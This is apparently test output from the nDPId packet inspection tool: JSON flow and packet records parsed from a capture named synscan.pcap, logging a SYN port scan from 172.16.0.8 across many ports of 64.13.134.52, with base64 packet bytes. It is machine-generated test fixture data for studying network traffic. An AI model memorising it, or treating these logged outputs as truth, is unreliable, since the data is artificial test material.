+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAso3UAADMGcf2sEAAIQA2GNIzSRdXdUoMYAAAAAGACEADiuQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsMF0AADkG3xWsEAAIQA2GNIzSHmHdUoMYAAAAAGACCAASLgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsn0UAADYGcy2sEAAIQA2GNIzSEvDdUoMYAAAAAGACDAAZnwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAs4gcAADQGMmusEAAIQA2GNIzSgArdUoMYAAAAAGACBAC0hAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsXREAADQGt2GsEAAIQA2GNIzSPtDdUoMYAAAAAGACBAD1vgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsteEAACUGbZGsEAAIQA2GNIzSBjrdUoMYAAAAAGACCAAqVQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsnHoAADgGc\/isEAAIQA2GNIzS\/ejdUoMYAAAAAGACBAA2pgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAslDEAACYGjkGsEAAIQA2GNIzSBDPdUoMYAAAAAGACDAAoXAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsoWoAADoGbQisEAAIQA2GNIzSBRTdUoMYAAAAAGACDAAnewAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAso5AAACsGeeKsEAAIQA2GNIzSCo3dUoMYAAAAAGACEAAeAgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsvS0AAC4GXUWsEAAIQA2GNIzSA0vdUoMYAAAAAGACDAApRAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAscKEAADYGodGsEAAIQA2GNIzSB9XdUoMYAAAAAGACDAAkugAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsersAACgGpbesEAAIQA2GNIzSI\/DdUoMYAAAAAGACBAAQnwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsq6kAACYGdsmsEAAIQA2GNIzSFw\/dUoMYAAAAAGACDAAVgAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsKewAADoG5IasEAAIQA2GNIzSBCvdUoMYAAAAAGACDAAoZAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsObQAAC0G4b6sEAAIQA2GNIzSD6PdUoMYAAAAAGACCAAg7AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAs3g8AACoGQGOsEAAIQA2GNIzShGvdUoMYAAAAAGACDACoIwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsLuQAAC0G7I6sEAAIQA2GNIzSHfzdUoMYAAAAAGACCAASkwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAsY6MAADsGqc+sEAAIQA2GNIzSOGrdUoMYAAAAAGACEADwJAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAsaAkAACYGummsEAAIQA2GNIzSemndUoMYAAAAAGACDACyJQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAsT64AACsGzcSsEAAIQA2GNIzSBN\/dUoMYAAAAAGACEAAjsAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAs7g4AADoGIGSsEAAIQA2GNIzSBR\/dUoMYAAAAAGACDAAncAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAs1RQAACkGSl6sEAAIQA2GNIzSJr3dUoMYAAAAAGACCAAJ0gAAAgQFtA=="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1278275058093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275058093,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACHppjNJGY57x3VKDGVAUAADweQAAAAAAAAAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsYKcAACgGv8usEAAIQA2GNIzT\/ejdU4MZAAAAAGACBAA2owAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 